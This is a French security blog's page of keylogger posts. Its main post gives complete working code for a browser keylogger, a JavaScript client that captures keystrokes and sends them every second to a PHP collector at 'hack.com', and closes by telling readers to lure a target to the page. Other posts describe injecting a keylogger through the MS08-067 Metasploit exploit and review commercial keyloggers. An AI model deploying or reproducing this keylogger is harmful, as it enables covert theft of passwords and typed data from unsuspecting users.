Affichage des articles dont le libellé est keylogger. Afficher tous les articles
Affichage des articles dont le libellé est keylogger. Afficher tous les articles

dimanche 21 décembre 2014

Créer un keylogger avec Javascript, c’est bien…

Souvenez-vous de BeEF et de ses possibilités assez incroyables pour récupérer les informations saisies par un utilisateur dans un browser “hooké”. Et bien nous allons faire la même chose mais cette fois-ci avec un code “Javascript” maitrisé à 100%.

Sur le site de “XSS Payloads” (http://www.xss-payloads.com/) on trouve les morceaux de code correspondant à la partie cliente et la partie serveur de notre “keylogger Javascript”

Voici le code du serveur qui va nous permettre d’enregistrer les informations saisies par l’utilisateur piégé:

   1: <?php
   2: if(!empty($_GET['c'])) {
   3:   $f=fopen("log.txt","a+");
   4:   fwrite($f,$_GET['c']);
   5:   fclose($f);
   6: }
   7: ?>

Et voici le code du client que nous allons ajouter à notre page web pour la transformer en “keylogger”:



   1: <script language="javascript">
   1:  
   2: var keys='';
   3: document.onkeypress = function(e) {
   4:   get = window.event?event:e;
   5:   key = get.keyCode?get.keyCode:get.charCode;
   6:   key = String.fromCharCode(key);
   7:   keys+=key;
   8: }
   9: window.setInterval(function(){
  10:   new Image().src = 'http://hack.com/keylogger.php?c='+keys;
  11:   keys = '';
  12: }, 1000);
</script>

Il ne nous reste plus qu’à inciter notre cible à visiter notre page!


image


Et voici le contenu de notre fichier “log.txt”


image


Merci à @edgtslfcbngq6sk pour la découverte de la source “XSS Payloads”

dimanche 5 juillet 2009

Quand Metasploit joue au Keylogger!

Au travers de cet article nous allons découvrir que Metasploit permet aussi de faire du keylogging à distance.

L'attaque se passe en trois temps. La première étape consiste à exploiter une faille présente sur la machine cible (dans notre cas un Windows XP SP2). La faille choisit est la faille MS08-067.
La deuxième étape consiste à injecter la dll qui nous permettra de faire du keylogging sur le poste cible. La dernière étape consiste à exploiter cette faille en associant le keylooging aux processus qui fonctionnent sur la machine cible et que l'on veut surveiller. Dans le cadre de la vidéo nous associons notre keylogger aux processus "explorer.exe" et "winlogon.exe".


Afin de décrire en quoi consiste la faille MS08-067, vous trouverez ci-après un extrait du bulletin de sécurité Microsoft MS08-067 paru le 23 octobre 2008:

"Cette mise à jour de sécurité corrige une vulnérabilité signalée confidentiellement dans le service Serveur. La vulnérabilité pourrait permettre l'exécution de code à distance si un système affecté recevait une requête RPC spécialement conçue. Sur les systèmes Windows 2000, Windows XP et Windows Server 2003, un attaquant pourrait exploiter cette vulnérabilité pour exécuter du code arbitraire sans nécessiter d'authentification. Il serait possible d'utiliser cette vulnérabilité dans la création d'un ver. Les meilleures pratiques en matière de pare-feu, ainsi que les configurations par défaut des pare-feu, contribuent à protéger les ressources réseau contre les attaques lancées depuis l’extérieur de l’entreprise.

Il s'agit d'une mise à jour de sécurité de niveau « critique » pour toutes les éditions prises en charge de Windows 2000, Windows XP, Windows Server 2003 et de niveau « important » pour toutes les éditions prises en charge de Windows Vista et Windows Server 2008."

Pour information les bulletins de sécurité de Microsoft peuvent être consultés à l'adresse suivante: http://www.microsoft.com/france/technet/security/bulletin/default.mspx

Sur ce site vous avez la possibilité de vous abonner aux newsletters et alertes Sécurité Microsoft.

Pour ceux qui ne sont pas familier avec les processus de Windows, l'explorateur Windows ("explorer.exe") est l'application utilisée dans le système d'exploitation Windows pour l'affichage, l'exploration et l'utilisation des fichiers et répertoires.

Quant à "winlogon.exe", c'est un composant de Windows qui gère l'ouverture et la fermeture de session, et le "Ctrl-Alt-Delete".
En particulier, il charge le profil d'un utilisateur après qu'il se soit authentifié, et il gère l'écran de veille.

Vous trouverez ci-dessous la vidéo de l'exploit:


D'une manière générale pour éviter d'être la cible de ce type d'attaque vous devez avoir un pare-feu personnel mis à jour.

Bien entendu votre pare-feu peut lui même être la cible d'attaque afin de vous laisser croire qu'il contrôle la situation alors qu'il a été désactivé. Mais ceci est une autre histoire...!

lundi 29 juin 2009

Keyloggers et screenloggers

On nous parle souvent des keyloggers et des screenloggers qui permettent pour les premiers, de récupérer les informations saisies par l'utilisateur au travers de son clavier ou pour les seconds, de faire des copies de l'écran de l'utilisateur à intervalles de temps réguliers.


L'objectif de cette article est de se faire une idée concrète de cette menace pour mieux la comprendre et adopter les bonnes contre-mesures.

Bien entendu il existe de nombreux outils de ce type, mais il a fallu faire un choix et comme vous le savez "Choisir c'est renoncer...!".

Nous avons testé pour vous Ghost Keylogger 3.40 et Spector Pro 5. Parmi ces deux outils, seul Spector semble être un vrai produit avec une existence légale au travers de la société SpectorSoft (http://www.spectorsoft.com/)

Vous trouverez ci-dessous la vidéo des tests.


Dans un prochain article nous verrons comment, avec Metasploit, il est possible de récupérer "à distance" les informations saisies par l'utilisateur sur son clavier. Mais c'est une autre histoire...!

Source : SpectorSoft (http://www.spectorsoft.com/) & Matthias que je remercie

Partager avec...